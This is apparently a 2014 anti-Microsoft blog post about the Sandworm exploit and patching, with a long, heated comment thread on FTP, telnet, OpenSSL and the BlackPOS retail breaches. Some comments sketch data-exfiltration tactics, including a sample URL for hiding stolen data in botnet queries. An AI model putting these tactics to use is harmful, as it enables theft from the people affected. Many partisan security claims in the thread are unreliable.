More Failures Of The Wintel Monopoly

A zero-day exploit of M$’s OLE, one of its tools of lock-in,“The Sandworm vulnerability is being actively abused to attack Swiss banking customers, Danish security consultancy CSIS has warned.” is now being used to rake Swiss banking customers who have not patched.

See The ULTIMATE CRUELTY: Sandworm uses PowerPoint against Swiss bank customers.

“Secunia estimates 12.6 per cent of UK users are running unpatched operating systems, up from 9.7 per cent the previous quarter. In addition, one in 10 third-party programs on the average PC are exposed due to failures in installing the latest security updates.”

see UK consumers particularly prone to piss-poor patching.

Of course, this damage could have been mitigated by promptly patching when M$ releases their “Patch Tuesday” updates or sooner in an emergency. That’s the point. Consumers are not IT-people. They don’t know about this stuff. They just know about the speed and convenience of PCs on the web. That other OS is supposed to be “easy to use” but that’s just PR in the ads. It’s also easy to lose all security, have the system slow to a halt or crash. Sometimes, M$ gets it wrong and the patches don’t work. Consumers eventually buy another machine or take the box in for repairs to get it working again.

Even proper IT-people have problems with M$’s zero-day vulnerabilities. Sometimes the malware-writers take the clues and have exploits released in hours so the patching has to happen at an inconvenient hour. I remember working over my lunch hour to patch >100 systems. We used WSUS and automatic updates on the clients but always a few would need to be reminded and then there were the servers… I hated Patch Tuesdays because a convenient time for release in Redmond, WA was the middle of my work-day where I lived. Basically, unless the world has IT-people working 24×7 the world is vulnerable for several billion PC-hours every month even if they patch religiously.

Then there’s GNU/Linux which is relatively free from malware, about 1K times more free, and keeps getting better with each release.

Of course, one should patch GNU/Linux systems too, but they do very well unpatched. The great beauty of GNU/Linux for consumers is that there are hundreds of distros and the typical malware-artist can’t hack them all simultaneously whereas “the monopoly” is a single big fat target. So, better code, fewer malwares and diversity all work together to protect consumers whereas the salesmen running M$ seek to make life “easy” for both consumers and malware-writers. I choose freedom. I use Debian GNU/Linux.

About Robert Pogson

I am a retired teacher in Canada. I taught in the subject areas where I have worked for almost forty years: maths, physics, chemistry and computers. I love hunting, fishing, picking berries and mushrooms, too.
This entry was posted in technology and tagged , , , , , . Bookmark the permalink.

169 Responses to More Failures Of The Wintel Monopoly

  1. dougman says:

    M$ not so sure with Azure and its assuring cloud.

    http://arstechnica.com/information-technology/2014/11/azure-went-down-and-people-actually-noticed/

    “An update was made to Azure Storage that caused the storage front-end servers to get stuck in an infinite loop, leaving them unable to service any requests. ”

    Sounds familiar, M$ pushes an update, actually a bad patch this causes an infinite reboot loop.

  2. dougman says:

    Weeeeeee….the patching just never ends.

    Microsoft’s just released the November rollup of product fixes to address issues that go back to April 2014….April!!….The new “dump” includes patches galore for Windows RT 8.1, Windows 8.1, and Windows Server 2012.

    http://support.microsoft.com/kb/3000850/

    Honestly, I think the entire “Start Me Up” advertisement should have renamed as “Patch Me Up”, lets reminisce with some more appropriate lyrics.

    If you patch me up
    If you patch me up I’ll never stop
    If you patch me up
    If you patch me up I’ll never stop
    I’ve been running hot
    You got me ticking gonna blow my top
    If you patch me up
    If you patch me up I’ll never stop..

    Now here is the funny part, in the advertisement M$ never included the following stanza…”You make a grown man cry” geee I wonder why? Perhaps its to true….LOLz.

  3. TEG wrote, “I don’t see any practical reason for, say, a so-called “big box retail” like Home Depot to run any sort of public-facing FTP service.”

    FTP servers are nearly perfect for distributing manuals, spec-sheets, brochures, etc. HomeDepot uses an FTP service for suppliers to upload video demonstrations of product.

    Lots of businesses use FTP for such data. e.g. Electrolux

    FTP may be the most efficient way to shift large files. Businesses appreciate efficiency because it increases their bottom line.

  4. oiaohm says:

    That Exploit Guy NT 3.5 shipped with telnet installed default. It was the last OS todo this. Nothing release in the 1990~s other than NT came with a telnet server installed by default. Its one of the historic oddities. But the issue is Microsoft telnet server is just as insecure now as it was in 3.5 time-frame.

    http://technet.microsoft.com/en-us/library/cc772455%28v=ws.10%29.aspx
    Question how do I enable SSL on the Microsoft provided telnet server to protect user-names and passwords and other transfered data. The answer is you don’t. Telnetd on Linux has a SSL mode. Again telnetd on Linux has chroot around it user access. At most with Microsoft telnet you can protect the login data by using NTLM authentication but this has not encrypted the stream as required to prevent packet injection.

    Problem here That Exploit Guy is Microsoft telnet server is the same security level as Windows NT 3.5 telnet server was. No update for the SSL security.

    This is the problem once you start lifting up windows hood there are a lot of problems under it.

    I simply don’t see why anyone wants such a thing in 2014.
    That Exploit Guy simple reality people are idiots and install random things. If it should not be used it should not be included as a option to choose from “Programs and Features” or at least provide very big warning not to windows does neither. Its 2014 there should be no telnet server in existence that is not just for games that does not support SSL.

    That Exploit Guy a few retailers here in Australia have a ftp server for MSDS(Material Safety Data Sheets).
    Seriously, unless you can download a hammer through the Internet, what is the point for the presence of an FTP service?
    This just reminded me of something super stupid. A hammer has a Material Safety Data Sheet just in case you are dumb enough to eat it. Yes it had instructions in case of ingestion because its a mandatory part of a MSDS. Your in the USA you might not have these completely wacky MSDS items. The hammer head contained enough toxic materials that it had to be listed.

  5. That Exploit Guy says:

    Of course I am forgetting Windows users. Telnet to a NT server allowed you to browse everywhere and start what ever command you liked. Scale of bad it passed FTP.

    There is no Telnet server on Windows unless you deliberately install one through Programs and Features, and I simply don’t see why anyone wants such a thing in 2014.
    Similarly, in a non-sarcastic way, I don’t see any practical reason for, say, a so-called “big box retail” like Home Depot to run any sort of public-facing FTP service. Forget about security. Forget about everything else. It’s just to put the cart before the horse. Who cares? The one and only important issue here with FTP is that there is no justification whatsoever for its use in the given scenario. Seriously, unless you can download a hammer through the Internet, what is the point for the presence of an FTP service?

  6. oiaohm says:

    DrLoser by the way apache httpd and iis virtual directories are just as big of risk of allowing a internal breach as a ftp server.

    Please note ftpd home directory does not have to match users login home directory. This is why it has its own ~/ftp/etc/passwd.

    So there is no reason why login home is not /home/salcl1 and /home/salcl1/ftp be the ftp server accessible. Due to chroot of ftpd accessing /home/salcl1 is out.

    If you are suffering from security risks with a ftp server on Linux you have employee admins who don’t know how to configure the ftp server they are using.

    Of course other servers make it easier to make a offset. http://www.proftpd.org for example has a DefaultRoot option that is just ~ of course is sane to change that to like ~/ftp or ~/scanner yes you can do the same using ftpd or pureftpd and every other Linux ftp server just different configuration files to change. All of them include chroot limitations and the means to alter where that is. Better quality servers include items like bandwidth limitations and ip access range limitations.

    This is the problem the complete security issue you talked about is 90 percent administrator error of turning on a FTP server and not configuring it.

    Using a company ftp server set up correct is a lot more secure than using items like dropbox. Yes a users ftp home directory can have absolutely nothing in common with their system login directory and that is normally what you call correctly configured ftp.

    Basically if you are not having ftp you have no remote http or fairly much anything else. The idea that ftp servers on Linux is not sand boxed is completely wrong. I sometimes hear this from people who have never set any Linux ftp server up correctly. Just like http class servers you need to allow only skilled staff todo this.

    There is really no security difference between a properly configured ftp server and a properly configures http server. It is the exact same set of issues.

    Out of the 12 ftp servers for windows. Only one includes any form of isolation and that is the Microsoft one for Windows Servers only. This is just an extremely sad state of affairs. LogicalDOC and CrushFTP servers example supports chroot on Linux, bsd…. under windows we do nothing to protect the provided ftp.

    If you want to talk about who has a ftp problem its not Linux as such. Linux can have miss configured ftp servers. Miss configured http servers can happen as well this is quality of your administration staff.

    Most of the windows the ftp servers are down right poor quality and it really will not matter how much the administrators do to attempt to fix them.

    Note Linux 7 ftp servers windows 12 ftp servers. Yes Windows has more choice of ftp servers every choice they have is crap except for 1 that is buy Microsoft server product. Linux ever ftp server is security good just need to be configured correctly and not have defective libraries.

    DrLoser you have really just presume that the issue with FTP is a major Linux thing. Its not a major Linux thing. DrLoser please obey the rule in future before throwing stones make sure you are not the one standing the the glass house. Attacking Linux people over FTP and being a Windows person you should expect major rocks thrown back.

  7. dougman says:

    Check out the pricing on these Surface things: https://www.google.com/search?q=surface+pro&oq=surface+pro&aqs=chrome..69i57l2j69i60j69i65l3.1630j0j4&sourceid=chrome&es_sm=122&ie=UTF-8#q=surface+pro&tbm=shop

    Honestly, Chromebooks are a better deal, Surface devices are full of problems, overheating and M$ keeps pushing out patches and firmware updates to fix them all.

    http://www.infoworld.com/article/2608605/tablets/surface-pro-3-problems-linger-despite-three-firmware-patches-in-a-month.html

    http://www.infoworld.com/article/2608879/microsoft-windows/fifth-surface-pro-3-patch-in-two-months-still-doesn-t-address-the-big-problems.html

    http://www.infoworld.com/article/2608942/microsoft-windows/microsoft-tries-yet-again-to-fix-surface-pro-3-wi-fi-problems.html

    Seriously, don’t expect M$ to rush and attempt to resolve the majority of these problems soon, all they seem to care about is continual patching and reaching for your wallet.

    All the units in stock currently, sitting on shelves all suffer from these problems and waiting for a consumer to bear the brunt of the M$ headache.

  8. DrLoser wrote, “have you come up with a credible scenario whereby it’s just as easy to exfiltrate stashed data via HTTP as it is via FTP?”

    Sure, the malware browses to FaceBook and fills out text-fields or uploads a file to whatsit.ru or …

    If uploads are banned somehow, malware can just browse the nodes of a botnet with encrypted data mixed in with the URI, like http://someserver.somewhere/index.php?q=iklorgjkjhjkwgefkhzdsfkjbjdgjfdjhrg and that server replies with some random sentence.

  9. oiaohm says:

    http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html

    DrLoser really the link from you link is a far better read. This is the process of dealing with flaws. 1) work out how it got in. 2) when it was first detected 3) design mitigation plan. Notice that the code at Microsoft was not scanned.

    Yes is 2014 and Microsoft is not using coverity to look for defects.

    http://www.coverity.com/press-releases/coverity-releases-platform-update-for-openssl-heartbleed-defect/
    Yep coverity has updated to detect heartbleed like bugs. Ok valgrind was able to detect these bugs before by brute force events.

    http://www.sciencedaily.com/releases/2014/11/141113140011.htm
    Since selinux and other Linux LSM could not detect shellshock or the recent openssl issues hello evolution.

    Then you have the Core Infrastructure Initiative by the Linux foundation.

    Give it a few years. This is what happens with Linux stack of weaknesses turn up system develops a new level of hardening to prevent it.

  10. oiaohm says:

    Unconstrained ftp server has not existed on Linux and BSD for over 20 years.

    A lot of third part FTP servers for Windows that users use so multi function printers/copiers work are truly Unconstrained FTP servers.

    This is one of the big problems. Linux being administrated by a Windows trained admin sees them over reacting to stuff. FTP not that harmful in the Linux world due to the better quality of the ftp servers.

  11. oiaohm says:

    DrLoser
    The wonderful thing about unconstrained FTP is that it allows me to browse all over the place.
    Of course I am forgetting Windows users. Telnet to a NT server allowed you to browse everywhere and start what ever command you liked. Scale of bad it passed FTP.

    ftpd is not a unconstrained ftp server http://linux.die.net/man/8/ftpd . Unconstrained FTP servers have not existed on Linux for years. Unconstrained FTP server only exists on Windows these days. ftpd implements a chroot around accessing process. This is standard min prac for every ftp server on Linux, BSD and OS X. Windows you don’t have chroot.

    Security holes are required to break out of ftp on Linux.

    As soon as someone uses unconstrained and ftp when talking about Linux you know they don’t have a single clue. You do need a privilege raise or a chroot breach exploit as well as ftp server flaw to get very far on Linux by even the most basic Linux FTP Server. ftpd is the most basic ftp server Linux has. Yes its not recommend because it lack some limiting options.

  12. DrLoser says:

    Just to be scrupulously fair about all this, here’s a link via Eric Lippert to CVE-2014-6332, which (what with being present from Win95 onwards) seems to be a huge beef around here.

    Let’s see what you all make of it.

  13. DrLoser says:

    Here’s a serious question, oiaohm.

    Do you have any IT security credentials at all? I mean, any?

    Certificates? Courses taken at the University of New England? A favourite book?

    Anything?

  14. DrLoser says:

    Yes ftpd also support no annoymous logins as well.

    How long did it take you to google that, oiaohm?

    I could have saved you the time. I knew that back in 1991.

    Now, here’s the thing. I have this FTP login ID, y’see, let’s call it for no very good reason salcl1. And I have the password to the account, y’see, which again for no very good reason we will assume is some sort of medium-strength thing like 4l4sk4!.

    The wonderful thing about unconstrained FTP is that it allows me to browse all over the place. What with various security holes I could even outreach myself, but in this case I’m just going to limit myself to things that Mr Dozy is apparently allowed to access. Mr Dozy being the idiot with said credentials.

    Now, Mr Dozy is allowed, for no good reason at all (I have pointed this out) to exfiltrate RAM-scraped data from a POS to what I presume is his desktop on a local network. That, in itself, should give you pause.

    Mr Dozy is now allowed to use the wonders of NFS (and to be absolutely scrupulously fair, it could be any other corporate file-sharing protocol) to exfiltrate said data to a server that has an outward facing FTP daemon.

    This is going to be tricky for you to figure out on your own, oiaohm, but …

    Guess what happens next?

    No animals were harmed in the course of this post. No M$ software was imputed. No criticism of any form of *nix was at any time implied.

    Sticking an outward facing FTP server in front of a corporate network is fscking INSANE!

  15. oiaohm says:

    Yes ftpd also support no annoymous logins as well.

  16. oiaohm says:

    DrLoser the old FTP protocol implemented as per ftpd and configured with -E switch is harmless when annoynous data provide/receive is configured correctly. Old FTP standard never said that you have to allow every user on a system to use it.

    Telnet server on NT took you to a cmd environment where you can do every you like as long as you had the user name and password.

    I am not cavalier. The reality you raised ftpd DrLoser. That program is one of the few items that can in fact implement the old ftp protocol secure by modern day standards. Port 21 ftp can and does accept TLS ftp or ftps. A secure upto date version of ftp.

    http://www.ipv4security.com/packet_flow/ftp_over_ssl.html
    You are the cavalier one Drloser killing off all ftp. Not all ftp is exploitable.

    http://en.wikipedia.org/wiki/FTPS

    We are 2014. FTPS sub form of ftp was formalized in 2005 yet was around from 1996. What is cavalier is that windows command line ftp client does not support it. Linux, OS X and BSD does. Windows is the most common cause for FTP server security on Linux and BSD to be downgraded.

    Basically FTP being a security issue should have died out.

    You have two choices with old protocol. Limit or not use. Advantage of using the old ftp protocol is the fact its not encrypted. Since its not encrypted proxy servers can cache it.

    DrLoser its like http vs https. http is older and insecure but used correct is absolutely zero security risk. ftp and ftps are the same except for one key difference ftp and ftps can be sitting on exactly the same port. Yes some ftp/ftps servers have honeypot mode where if you are attempting to login unencrypted you are black listed.

    DrLoser when did you do the secure audit I guess prior to 2005 and the newer ftp protocols. sftp closing it on devices can bring a nasty problem prior to 2005 like not being able to update firmware in some devices.

    http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol Yes sftp and ftps are two different protocols.

    Ftps is not firewall transparent due to its multi port usage. Proper configured ftp server using modern day standards by nature is limited to the local lan unless administrator messes with the firewall rules.

    Please note ftpd does not implement sftp it only implements ftps. So -E without messing with stuff basically equals only accept logins from local lan unless anonymous.

  17. DrLoser says:

    Quite honestly, oioahm, given your cavalier attitude towards FTP, I wouldn’t recommend that anybody entrusts you with the security demands of an electric fence.

    Which, given that little oopsie with a $1 million prize bull, perhaps nobody does any longer …

  18. DrLoser says:

    I would actually make the claim (though I admit this would be hard to sustain, and I’d have to put considerable effort in) that a vanilla Telnet port is less of a security risk than the equivalent FTP port.

    And, believe me, that’s saying something.

    Now, Robert, have you come up with a credible scenario whereby it’s just as easy to exfiltrate stashed data via HTTP as it is via FTP?

    No? Colour me unsurprised.

  19. DrLoser says:

    Security demands a process of deprecation and limitation.

    Nope. Security “demands” (even this is questionable and domain-dependent) proper architecture and proper auditing. Deprecation and limitation are completely irrelevant.

    Old FTP protocol limited is harmless.

    This is a circular argument. You are basically saying that “Old FTP protocol” is harmless, except when it isn’t.

    When outward facing, FTP is almost certainly the worst possible protocol you can choose from the point of view of security.

    Nothing else in your mountain of text can excuse that fact.

  20. DrLoser says:

    There are many SSL libraries that emulate OpenSSL…

    OK, stop that nonsense right there.

    Whether or not a library emulates any other library that reliably implements a protocol is of no interest to anybody at all.

    Does it reliably implement the underlying protocols?

    That’s all we need to know.

  21. oiaohm says:

    There are many SSL libraries that emulate OpenSSL in a embedded device you may have a SSL called WolfSSL. 20 times smaller than OpenSSL supports all the OpenSSL interfaces and has full formal documentation and better yet Zero CVE issues ever.

    DrLoser problem WolfSSL is pure GPLv2 and a lot of people don’t like the license.

    Big question how come WolfSSL is 20 times smaller than OpenSSL. Yep OpenSSL contains a lot of garbage code that does not relate to making a sane implementation.

    FOSS has provided good solid SSL implementations. Yes the insecure mess option due to less restrictive license versions has been used. So a ftpd using wolfssl does not contain any of the OpenSSL issues.

    DrLoser if FOSS was always crap you would not have functionally secure implementations of stuff in FOSS. The problem is making the bazaar users/buyers avoid the crap projects so crap projects have to lift their game.

  22. oiaohm says:

    DrLoser
    As regards “under-documented,” I do so believe, oiaohm. Because the lack of documentation per se does not indicate vulnerability to any attack whatsoever. Now, you could propose the theory that, with full & open documentation, the attack vectors would be mitigated or (in Bizarro World) completely eliminated by third party testers, coders and so on … not that helped OpenSSL much … but that would be a completely different thing.
    OpenSSL is underdocumented. Where is the formal document on how its random generator works and that is mathematically sound. GnuTLS and most other commercial implementations of SSL have a formal document describing the random number generator. OpenSSL is the odd one out here.

    Issue here is third party testers in the case of the OpenSSL issues and Bash Shell-shock did in fact work to detect the issue and this is documented in the OpenSSL and Bash bug lists. Turns out there is a difference between many eyes finding the bugs and those bugs being fixed. FOSS has operated as a Police less bazaar with the coding equal to criminal behavior. The Linux Foundation has now provided a police force. So like it or not DrLoser things have changed.

    DrLoser lack of documentation may not indicate a security flaw but it also means a properly test suite cannot exist either. OOXML, RTF and OLE MS Office formats are all under documented and heavily lacking in test suites result is on going failures around those formats. ODF CVE to OOXML CVE is hugely different. You can count ODF CVE issues on 1 hand and OOXML a younger format is already in the hundreds of CVE issues. Why is OOXML so bad large sections of it is do as MS Office functions lets not bother auditing if that functionality is sane.

    DrLoser how do you perform a full formal audit on something without producing the documentation. The answer is you cannot. The lack of documentation in FOSS projects is something to worry about. The lack of documentation is sign of lack of Audit team. But you also have to remember is closed sources producing companies like Microsoft and others are also guilty of lack of documentation. Lack of documentation is a symptom of a major issue.

    In fact I can give you an example. Alfresco CMS everything its program does is documented. Result is a 0 CVE count. Alfresco was coded and audited.

    There are also examples in the FOSS world that are bad Apache Httpd server is under-documented and it has had a running list of flaws.

    This is one of the highly interesting things. Quality of documentation directly links to CVE count. Its the only thing that has ever been found that there is a provable correlation that you can inspect without having access to the source code to work out CVE risk.

    DrLoser FTP is correctly listed as insecure this is also formally documented. You do have to remember FTPS and SFTP both don’t send password in plain text any more. Both are newer versions of FTP. Yet if the data is public there is no particular reason other than FTP requirements of needing IP address not to have a FTP server open to the public.

    http://linux.die.net/man/8/ftpd Please do read DARPA standard FTP server documentation note option -E. That is right the item does not accept FTP sending passwords plaintext. If you type any other user than anonymous on a not encrypted with ftpd the connection is terminated straight away with this on. Does not even validate if the username is correct.

    DrLoser yes something might have a ftp server on it and it might be fully secure. Anonymous access not encrypted but anything else is. Yes the sever called ftpd is designed by BSD world and is fully secure sod if set up correctly. As well its functionality is fully documented. So just because you detect ftp server running does not mean there is a security issue.

    Current day FTP server implementations should not accept passwords by plain text. Only out of date or poor configured FTP servers will accept passwords in plain text. Yes the current forms of FTP protocol include encryption options.

    DrLoser this is like SSL 2.0 all over again. Protocols that should be not in use or limited in use are not by some implementers. Yes disabling old FTP format means to accept passwords and forcing clients to use newer FTP protocols solves the security issue. Remember old Windows networking also sends passwords in plain text.

    Security demands a process of deprecation and limitation. Old FTP protocol limited is harmless.

  23. DrLoser says:

    (Actually, to be precise, the same effect could be achieved on a Linux embedded machine by leaving an FTPd port open on 10.44.2.153 … but either way, not good. Not good at all.)

  24. DrLoser says:

    Incidentally, any lunatic who sets up their POS machines with any sort of “net use” capability whatsoever is being grossly negligent and deserves immediate dismissal, with prejudice.

    Once again, this is nothing to do with the specific OS. Imagine, for example, leaving an FTP server port open on a Linux embedded POS. The effect would be precisely the same.

    Security is security, no matter what OS you choose.

  25. DrLoser says:

    In other news, FTP may have been used to send out the data but the servers were severely compromised so any networking protocol could have been used, even HTTP. see New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts.

    The only thing new about that cite, Robert, is that it suggests that the actual RAM scraper has moved from some component of XPe itself to an Anti-Virus. Big deal. However:

    In one the biggest data breach we’ve seen in 2013, the cybercriminals behind it, offloaded the gathered data to a compromised server first while a different malware running on the compromised server uploaded it to the FTP. We surmise that this new BlackPOS malware uses the same exfiltration tactic.

    Not “some variant of the same exfiltration tactic,” Robert. The same tactic.

    Meaning, exfiltration via FTP.

    Note the preceding bit about net use t: and so on. What’s slightly alarming is that salcl1, whoever that might be, has presumably been phished for their password on a local subnet (I think we can agree that 10.44.2.153 is deep down on a subnet somewhere). This is actually worse than the server (be it Windows, Linux, Solaris, whatever) being compromised, in a sense, because you no longer need to exfiltrate the data from the POS terminal to the corp net via a borked service of some kind.

    So, that’s one more layer of security the Black Hats don’t need to compromise.

    Lucky them! After that, all they have to do is to use FTP (presumably via the same hapless salcl1 to exfiltrate the stash from the corp net to the outside world! Isn’t FTP wonderful?

    As for “any other protocol,” Robert … One of your better recent jokes, that.

    Try doing anything like this via simple HTTP, and you’re SOOL.

  26. DrLoser says:

    Yet for some reason you think that a under documented document format does not create server attacks???

    As regards “under-documented,” I do so believe, oiaohm. Because the lack of documentation per se does not indicate vulnerability to any attack whatsoever. Now, you could propose the theory that, with full & open documentation, the attack vectors would be mitigated or (in Bizarro World) completely eliminated by third party testers, coders and so on … not that helped OpenSSL much … but that would be a completely different thing.

    That said, no, I am not claiming that it’s impossible, or even unlikely, that a server attack can be crafted via a document of some sort. And indeed I made no such claim.

    I am claiming that the two security domains are completely different. I am claiming that you can’t just shrug off an idiocy like exposing FTP ports to the outside world by saying “but, but, look at M$ Office!”

    I am claiming that negligence over FTP, or the moral equivalent thereof, is almost certainly the route used by the Target and Home Depot attackers to retrieve their stashes of credit card information.

    Why do I claim this? Occam’s razor. It’s incredibly hard to envisage a way for them to do this via the Awesome Borked Powers of Microsoft Word.

    With FTP facing outward from the corporate network, however … it’s a breeze.

  27. DrLoser says:

    M$ apologists aside, Windows was called out as “the exact reason” for the theft to occur.

    Those three words in quotation marks … I don’t suppose you could extend yourself (as you so often do) to provide an actual citation?

    Probably not. Because it would come from the executives whose inability a) to update their POS systems when past their shelf life and b) to secure their server systems from outsiders wanting to retrieve stashes of confidential information …

    … caused the problem in the first place.

    There’s a long and dishonourable history of corporate executives blaming others for their own failings, Dougie. Don’t be one to join their ranks.

  28. dougman says:

    M$ apologists aside, Windows was called out as “the exact reason” for the theft to occur.

    Walgreens is probably next, as they still run windows server 2003, and run windows XP and XP embedded.

  29. oiaohm says:

    http://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-11116/Microsoft-Sharepoint-Server.html Yes Microsoft document formats is one of the ways to hack your privileges on a Sharepoint server. Yet for some reason you think that a under documented document format does not create server attacks???

    Really DrLoser Microsoft is in a real glass house. Interesting enough is the open source Alfresco that does share point protocol that is used by a huge number of companies has Zero CVE reports.

    http://www.linuxfoundation.org/programs/core-infrastructure-initiative

    This project DrLoser started after the last issue. Sorry to say just like the change when EU forced Microsoft to document things.

    Linux Foundation is taking the OpenSSL and Bash example as reason to act. In fact they are smart enough to know that there might be another OpenSSL or Bash like land mine out there. This is why the project is called core intrastructure initiative. Its goals are to find the miss managed projects and get them up to speed and if that is not possible advertise the fact they are insecure so prevent usage of those projects.

    DrLoser
    What a shame that Valgrind let you down. If only it were compulsory, except not.
    That is the thing. This is part of the Core Infrastructure Initiative changes. Usage of tools like Valgrind by core projects will become compulsory. Correction to your line is should read.
    What a shame that Valgrind let you down. If only it were compulsory, except was not.
    As usage of Valgrind and other tools like it is basically compulsory from now on. Project will get black marks against them for not using them.

    Give it a few years and you are going to not have as may issues to complain about DrLoser. At long last a group has taken formal responsibility to perform independent audit with all the force required.

    Yes keep on making a lot of Noise DrLoser. Then remember all those bugs you are referring to are patched in upto date Linux distributions and OS X. Where will you find systems with those flaws. None other than MS Windows. Yes programs do use ported bash and port openssl on Windows. It the Windows users who have the big important mess to clean up. Linux World will clean the past mess of bugs up and force from now on alteration in procedures to reduce how often it happens in the future.

    1 to 2 rogue projects cause lot of trouble. Please note shellshock issue was caused by the Bash developers adding a feature without doing security auditing on feature. Interesting enough that more and more distributions had been reducing usage of bash before the shellshock mess as well. Yes Bash security was being questioned by Distrobution maintainers before Shellshock.

    Would you say that the OpenSSL issues or Bash Shellshock issues came completely from out the blue? No because all the evidence shows there were people not trusting either fully. Bash Shellshock design issue was in fact first questioned in 2004.

    This is the reality lot of the recent issues with Openssl and Bash are over 10 years old from the point of first question about issue.

    DrLoser being a TMR guy you never bother following the history back. The Linux foundation in fact did a video covering the bugs you have been talking about and where they came from and how they happened with what was required to prevent it from happening again this is why the Core Infrastructure Initiative is funded.

    DrLoser before you keep on talking about Unix stupidity please remember that Microsoft Windows Servers was the last servers to stop shipping with telnet enabled by default. Telnet is kinda worse than Ftp. FTP was designed before the Internet existed. 1971 is FTP the mid 1980s is when Internet comes into existence. sftp is designed in the time frame of the Internet. By the way FTP was not designed for Unix but instead for a OS called Multics. Telnet also comes from Multics.

    Unix is kinda a clone of Multics. MS Trolls always blame things on Unix that have very little todo with Unix. Most of the Unix/Linux insecure designed network protocols were created at MIT and Microsoft. It is quite a min list of groups responsible for poor protocols.

    DrLoser I guess you like to forget netbios/NetBEUI mess that was designed in the time of the Internet and also lacked functional security. Yes that combination also sent passwords as plain text over network.

  30. DrLoser wrote, ““Using the server” is precisely my point about FTP, in re Target and Home Depot and others.”

    So you’re the hacker! Watch out for extradition.

    In other news, FTP may have been used to send out the data but the servers were severely compromised so any networking protocol could have been used, even HTTP. see New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts. This wasn’t just about FTP by any means. There were multiple malwares working on multiple servers collecting data and shipping it out. They certainly weren’t intercepting FTP. They were generating their own traffic consisting of stolen data.

  31. DrLoser says:

    So, since servers cost money, you can get more throughput for the money with FTP.

    For once, Robert, I didn’t even bother to verify your cites. (Which is fair enough. Apparently you routinely fail to do the same.)

    Show me a server that works 24 hours a day at maximum capacity (or even 50% capacity), and then we’ll talk.

    Otherwise this is either complete nonsense, or it’s a valuable consultancy opportunity for you, Robert.

    Somehow, I favour the former. But give it a go, anyhow.

  32. DrLoser says:

    Yes, it’s HTTP, not FTP. There’s little commonality between them.

    Really? I’m prepared to be amazed by your perspicacity on this subject, Robert.

    But, let’s first examine your Wikipedia cite, which sadly lacks peer-reviewed Pogsoniana:

    HTTP essentially fixes the bugs in FTP that made it inconvenient to use for many small ephemeral transfers as are typical in web pages.

    FTP has a stateful control connection which maintains a current working directory and other flags, and each transfer requires a secondary connection through which the data is transferred. In “passive” mode this secondary connection is from client to server, whereas in the default “active” mode this connection is from server to client.

    I am too poor an IT guy to have a fscking clue what that couple of paragraphs is on about. Do feel free to expand on whatever it was, Robert.

    Here’s the simplest way I can describe FTP: it’s a File Transfer Protocol, defined by RFC 959.

    In passing, isn’t it interesting that us “trolls” have spent the last twenty years of their lives dealing with RFCs and such, whereas all you, Robert, have managed to do is to drop a laptop onto an Arctic runway?

    Well, maybe not.

    Anyhow, let’s proceed from RFC959. It’s regrettably vague, but apparently it thinks that FTP is a protocol that exists above the transport (TCP/IP) level.

    I say “vague.” I mean, “Completely incorrect.”

    FTP is clearly at the ISO/OSI “Presentation level.” It’s a poster-child for the *nix stupidity of stipulating that everything to do with a protocol should be “in plain text.”

    As such, it’s not much use on its own. But, with a huge amount of effort, it can be incorporated into, say, HTTPS.

    And precisely how would that “incorporation” happen, Robert?

    Why, what a surprise! It’d be exactly the same exchange of bits and bytes over the “lower level protocol.”

    Eg, to take your example, HTTP.

  33. DrLoser wrote, “You do know the default protocol for downloading a file through HTTP, don’t you, Robert?”

    Yes, it’s HTTP, not FTP. There’s little commonality between them. see Wikipedia, FTP – Differences from HTTP. Basically, HTTP is better at what it does, transfer gazillions of smallish files, and FTP is better at what it does, transfer many larger files.

    In tests on tiny servers, FTP can sustain thousands of connections and max out bandwidth whereas Apache can only sustain a few hundred. FTP being simpler just uses fewer resources per connection. So, since servers cost money, you can get more throughput for the money with FTP.

  34. DrLoser says:

    But I don’t want to leave oiaohm behind in this. He might well have a propensity to “move the goalposts” — indeed, that’s all he ever does, beyond fantasising and getting things hopelessly and provably wrong — but he’s good for a joke now and again:

    This is why the Linux foundation is starting a audit team now. So we have a group with enough respectable force to hopefully to get project leads proper attention and if that fails has the resources to advertise the issues.

    Interesting that a marketing organisation (the Linux Foundation) should somehow take charge of making OpenSSL … sort of … work. Any credentials?

    Never mind. Let’s just “advertise the issues.”

    SSL, multiple times.
    Heartbleed.
    ShellShock.

    Enough “issues” for you, oiaohm?

    What a shame that Valgrind let you down. If only it were compulsory, except not.

    And apparently (I didn’t check, but oiaohm did), there are still thousands of memory issues out there in OpenSSL!

    Given which … hey, there’s nothing wrong with FTP.

    At least FTP doesn’t claim any sort of security whatsoever.

  35. DrLoser says:

    Modifying it or using the server to penetrate to more sensitive data would be a bigger concern.

    Good, Robert, very good.

    “Using the server” is precisely my point about FTP, in re Target and Home Depot and others.

  36. DrLoser says:

    FLOSS by its nature has backup so any denial of service/deletion of files is not of huge economic consequence because the data can be found elsewhere.

    Customer: My credit card details were scraped off a Target/[insert here] POS! I’m being charged $1,000 for nothing!
    Wise Man: Did you experience “denial of service?”
    Customer: What’s one of those? I don’t think so. I’ve just got this $1,000 charge on my monthly bill.
    Wise Man: But did they delete your files?
    Customer: What? I don’t think so. Does it matter? Would that cost me money? I’m confused. Anyway, about this identity theft thing …
    Wise Man: Never fear, Young One. The data can be found elsewhere…

    As in, say, Trans-Dniestr. You haven’t tried that one for Linux web pages, have you, Robert? I would if I were you. Trifficly secure and all.

    Here’s a question for you.

    What on earth has this to do with the question of how Home Depot came to cough up the credit card details of a couple of hundred thousand customers?

    Or, indeed, to the purported universal and obviously totally secure value of FTP?

    It’s very possible that “FLOSS” has everything to do with all that.

    But I don’t imagine that you’d like to hear why.

  37. DrLoser says:

    Any small carps about all that, Robert?

    No?

    Oh, I forgot. Microsoft is Evil!

  38. DrLoser wrote, of the value of FLOSS, “Care to dig yourself any deeper hole”?

    Of course FLOSS has a lot of value, but when you are trying to “give it away”/share it, there’s no concern about anyone stealing the information from a server. Modifying it or using the server to penetrate to more sensitive data would be a bigger concern. FLOSS by its nature has backup so any denial of service/deletion of files is not of huge economic consequence because the data can be found elsewhere.

  39. DrLoser says:

    That could be important where the volume of data is very high or the value is very low, typical of many archives of FLOSS, for instance.

    I’d also take issue with your insistence that the value “of many archives of FLOSS” is “very low.”

    I’d prefer the term “negligible,” or possibly “worthless since the last LTS.”

